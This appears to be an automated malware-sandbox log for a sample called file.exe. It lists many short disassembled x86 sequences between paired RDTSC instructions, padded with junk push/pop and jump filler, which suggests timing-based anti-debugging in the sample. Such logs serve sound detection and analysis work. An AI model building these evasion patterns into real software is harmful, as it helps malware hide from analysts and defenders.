              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0ECA1 second address: C0ECAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F893453D386h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0ECAB second address: C0ECB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0ECB1 second address: C0ECC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F893453D386h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0ECC1 second address: C0ECC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0EF8E second address: C0EF94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F3CB second address: C0F3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F3D1 second address: C0F3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F52D second address: C0F532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F6B8 second address: C0F6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F6C1 second address: C0F6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F6C7 second address: C0F6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F6CD second address: C0F6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0E5CD second address: C0E5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0E5D3 second address: C0E5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 push esi 0x00000008 js 00007F8934532D06h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13186 second address: C1318C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1318C second address: C131A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F8934532D0Bh 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12946 second address: C12959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D38Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12959 second address: C12984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8934532D16h 0x0000000a pushad 0x0000000b jmp 00007F8934532D0Bh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12984 second address: C1298C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12B05 second address: C12B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8934532D14h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12B24 second address: C12B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12C70 second address: C12C78 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12C78 second address: C12CCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D392h 0x00000007 push edi 0x00000008 jbe 00007F893453D386h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jl 00007F893453D3C3h 0x00000019 jmp 00007F893453D390h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F893453D399h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12CCB second address: C12CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12CCF second address: C12CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12E44 second address: C12E75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8934532D16h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15568 second address: C1556C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1556C second address: C155AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8934532D0Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F8934532D13h 0x00000011 jmp 00007F8934532D18h 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C155AD second address: C155C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F893453D395h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C150A9 second address: C150B5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8934532D06h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15264 second address: C1526E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F893453D386h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1526E second address: C15278 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8934532D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1AE52 second address: C1AE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D398h 0x00000009 jmp 00007F893453D396h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1AE85 second address: C1AE96 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8934532D08h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1AE96 second address: C1AE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1A3D2 second address: C1A3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1A521 second address: C1A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F893453D386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1A52D second address: C1A536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C247DE second address: C247F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F893453D38Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD28B1 second address: BD2903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8934532D0Ch 0x00000009 popad 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F8934532D08h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D27C8h] 0x0000002c push 00000004h 0x0000002e and ecx, dword ptr [ebp+122D2A54h] 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a js 00007F8934532D06h 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C239D6 second address: C239DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23B40 second address: C23B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23B46 second address: C23B66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F893453D396h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23B66 second address: C23BA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8934532D13h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jg 00007F8934532D06h 0x00000015 jmp 00007F8934532D17h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23BA7 second address: C23BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23BAB second address: C23BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23BB1 second address: C23BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23BB6 second address: C23BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2B7C9 second address: C2B7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2B7CD second address: C2B7D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2B7D1 second address: C2B7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2B7D7 second address: C2B7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2B7DD second address: C2B7E7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F893453D38Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29A82 second address: C29A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8934532D06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29A8E second address: C29A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A075 second address: C2A07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A3CA second address: C2A3E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jnc 00007F893453D386h 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A3E0 second address: C2A400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnp 00007F8934532D06h 0x0000000b jmp 00007F8934532D0Ch 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2AC5E second address: C2AC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D38Ah 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F893453D395h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2CE0B second address: C2CE32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F8934532D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8934532D17h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2CE32 second address: C2CE56 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F893453D386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F893453D386h 0x00000011 jmp 00007F893453D391h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C308D4 second address: C308E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8934532D06h 0x00000009 jmp 00007F8934532D0Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C308E9 second address: C3093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F893453D394h 0x0000000b jg 00007F893453D386h 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jc 00007F893453D3AAh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3093A second address: C30946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8934532D06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30C14 second address: C30C3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D38Eh 0x00000007 jmp 00007F893453D397h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30C3D second address: C30C47 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8934532D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30D98 second address: C30DAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F893453D38Eh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30DAC second address: C30DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8934532D10h 0x00000009 jno 00007F8934532D06h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30DC6 second address: C30DCC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C312B4 second address: C312D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F8934532D19h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B6BE second address: C3B712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F893453D395h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jl 00007F893453D386h 0x00000017 jnc 00007F893453D386h 0x0000001d jmp 00007F893453D399h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jnc 00007F893453D386h 0x0000002b jg 00007F893453D386h 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B712 second address: C3B716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B716 second address: C3B71C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BB9B second address: C3BB9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BB9F second address: C3BBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BCDF second address: C3BCF5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F8934532D0Ch 0x00000010 jne 00007F8934532D06h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BCF5 second address: C3BD2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D38Ch 0x00000007 jmp 00007F893453D392h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F893453D394h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BD2F second address: C3BD3B instructions: 0x00000000 rdtsc 0x00000002 je 00007F8934532D06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BD3B second address: C3BD42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BE60 second address: C3BE73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8934532D06h 0x00000009 jo 00007F8934532D06h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C458F7 second address: C45903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 js 00007F893453D386h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C45903 second address: C45907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C45B67 second address: C45BA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F893453D399h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jnp 00007F893453D392h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F893453D38Ah 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C518D9 second address: C518DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C513FD second address: C5140A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007F893453D38Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5140A second address: C5140E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5140E second address: C51418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F893453D386h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C51418 second address: C51462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D0Bh 0x00000007 jmp 00007F8934532D17h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F8934532D0Dh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8934532D13h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C51462 second address: C51467 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C590AC second address: C590B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C590B6 second address: C590BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C590BB second address: C590C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8934532D06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C657CF second address: C657DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F893453D386h 0x0000000a pop esi 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C93D second address: C6C951 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8934532D08h 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F8934532D06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C951 second address: C6C955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CAAF second address: C6CAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CAB3 second address: C6CAB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CAB9 second address: C6CABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CABF second address: C6CAD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D38Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F893453D386h 0x0000000f rdtsc
